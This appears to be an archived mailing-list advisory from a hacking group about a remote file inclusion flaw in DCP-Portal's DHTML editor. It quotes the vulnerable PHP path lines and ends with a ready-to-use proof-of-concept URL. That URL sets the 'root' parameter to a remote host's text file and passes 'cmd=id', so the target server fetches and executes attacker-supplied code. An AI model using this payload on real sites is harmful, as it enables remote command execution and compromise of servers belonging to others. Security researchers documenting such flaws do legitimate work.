<<< Date Index >>>     <<< Thread Index >>>

[Kurdish Security # 8] DCP-Portal Remote File Include Vulnerability [Editor DHTML]



# Kurdish Security Advisory
# irc.gigachat.net #kurdhack 
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz 

$url_path_editor = "$root_url/library/editor/"; 
$abs_path_editor = "$root/library/editor/"; 

?>

Proof Of Concept 

http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id